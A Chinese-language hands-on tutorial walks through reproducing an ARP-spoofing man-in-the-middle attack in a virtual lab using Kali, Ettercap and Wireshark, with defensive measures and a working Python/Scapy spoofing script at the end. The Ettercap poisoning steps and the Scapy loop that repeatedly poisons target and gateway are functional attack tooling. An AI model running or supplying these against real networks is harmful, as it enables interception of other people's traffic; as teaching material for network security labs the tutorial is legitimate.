告别枯燥实验报告:用Kali+Ettercap+Wireshark实战ARP欺骗,手把手教你复现中间人攻击
从零玩转ARP欺骗:Kali+Ettercap+Wireshark实战中间人攻击
网络安全的世界里,ARP欺骗就像一场精心设计的魔术表演——攻击者悄无声息地篡改网络设备的"通讯录",让数据包错误地流向自己的口袋。不同于传统实验报告的刻板流程,我们将用游戏化的方式,带你亲手搭建这个"魔术舞台"。
1. 环境搭建:准备你的虚拟战场
在开始这场网络攻防演练前,我们需要配置好实验环境。就像游戏玩家需要选择装备一样,这里的关键道具是两台虚拟机:
- 攻击主机:Kali Linux 2023.3(预装Ettercap和Wireshark)
- 靶机:Windows 10/11(建议关闭防火墙临时测试)
提示:VMware或VirtualBox的网络模式请设置为NAT,这能模拟最常见的家庭/办公室网络环境。
验证网络连通性的几个基本命令:
# Kali中查看IP配置 ifconfig eth0 # Windows中查看IP配置 ipconfig /all # 双向ping测试 ping 靶机IP # 从Kali执行 ping 攻击机IP # 从Windows执行常见问题排查表:
| 症状 | 可能原因 | 解决方案 |
|---|---|---|
| 无法互相ping通 | 防火墙阻挡 | 临时关闭Windows防火墙 |
| 只能单向通信 | 网络配置错误 | 检查两台虚拟机是否同属一个子网 |
| 延迟极高 | 虚拟机资源不足 | 为虚拟机分配更多CPU和内存 |
2. ARP协议精要:理解魔术的机关
ARP(地址解析协议)是这场"魔术"的核心道具,它负责将IP地址转换为MAC地址。正常流程是这样的:
- 主机A想与192.168.1.100通信
- 广播发送ARP请求:"谁的IP是192.168.1.100?"
- 目标主机回复:"我是192.168.1.100,我的MAC是AA:BB:CC:DD:EE:FF"
- 主机A将这对映射存入ARP缓存表
ARP欺骗的精妙之处在于:
- 无认证机制:设备会无条件信任收到的ARP响应
- 缓存覆盖:新的ARP响应会自动覆盖旧的记录
- 广播特性:攻击者可以伪装成任何IP进行响应
用Wireshark抓取的正常ARP交互:
No. Time Source Destination Protocol Info 1 0.000000 AA:BB:CC:DD:EE:FF Broadcast ARP Who has 192.168.1.100? 2 0.000123 11:22:33:44:55:66 AA:BB:CC:DD:EE:FF ARP 192.168.1.100 is at 11:22:33:44:55:663. 实战Ettercap:图形化攻击演示
Ettercap的GUI模式让攻击变得像玩策略游戏一样直观。跟着这些步骤操作:
启动Ettercap图形界面:
sudo ettercap -G在菜单栏依次操作:
Sniff→Unified sniffing→ 选择网卡(通常eth0)Hosts→Scan for hosts扫描网络设备Hosts→Hosts list查看发现的设备
设置攻击目标:
- 在主机列表中选择网关IP → 点击
Add to Target 1 - 选择靶机IP → 点击
Add to Target 2
- 在主机列表中选择网关IP → 点击
发起ARP欺骗攻击:
Mitm→ARP poisoning- 勾选
Sniff remote connections - 点击
OK开始攻击
实时观察攻击效果:
# 在靶机上查看被污染的ARP表 arp -a # 预期输出示例: Internet Address Physical Address Type 192.168.1.1 00:11:22:33:44:55 dynamic # 实际应是攻击机的MAC4. Wireshark抓包分析:解密攻击流量
启动Wireshark监控网络流量,重点关注这些特征:
sudo wireshark关键过滤表达式:
arp:仅显示ARP协议流量eth.src == 攻击机MAC:追踪攻击机发出的帧ip.addr == 靶机IP:监控靶机相关通信
典型的攻击流量模式:
攻击机持续发送ARP响应包:
- 告诉网关:"我是靶机IP,我的MAC是攻击机的"
- 告诉靶机:"我是网关IP,我的MAC是攻击机的"
正常通信被重定向:
- 靶机发送给网关的数据 → 实际流向攻击机
- 网关发送给靶机的数据 → 实际流向攻击机
网络异常表现:
- 靶机突然无法访问外网
- ping测试出现超时
- 特定网站加载异常
5. 防御策略:构建你的网络安全护盾
了解攻击手段后,这些防御措施值得实施:
静态ARP绑定(最有效方法):
# Windows中设置静态ARP条目 arp -s 网关IP 网关真实MAC # Linux中设置静态ARP条目 sudo arp -s 网关IP 网关真实MAC网络设备防护:
- 启用交换机的端口安全功能
- 配置DHCP Snooping+DAI防护
- 部署ARP防火墙软件
监测手段:
# Linux下检测ARP异常 arpwatch -i eth0 # Windows下使用批处理定期检查 @echo off arp -a > current_arp.txt fc /b baseline_arp.txt current_arp.txt6. 进阶玩法:Python实现ARP欺骗
对于想深入理解原理的开发者,可以用Scapy库手动构建攻击包:
from scapy.all import * import time def arp_spoof(target_ip, gateway_ip, iface): target_mac = getmacbyip(target_ip) gateway_mac = getmacbyip(gateway_ip) while True: # 欺骗靶机 send(ARP(op=2, pdst=target_ip, psrc=gateway_ip, hwdst=target_mac)) # 欺骗网关 send(ARP(op=2, pdst=gateway_ip, psrc=target_ip, hwdst=gateway_mac)) time.sleep(2) # 使用示例 arp_spoof("192.168.1.100", "192.168.1.1", "eth0")关键参数说明:
| 参数 | 含义 | 注意事项 |
|---|---|---|
| op=2 | ARP响应类型 | 1为请求,2为响应 |
| pdst | 目标IP | 要欺骗的设备IP |
| psrc | 伪造的源IP | 假装是这个IP在响应 |
| hwdst | 目标MAC | 确保包送到正确设备 |
在实际测试中,我发现间隔2秒发送一次ARP响应能保持稳定的欺骗效果,又不会产生过多网络噪音。这个脚本运行后,可以配合Wireshark观察靶机ARP表的变化过程,非常有助于理解协议工作原理。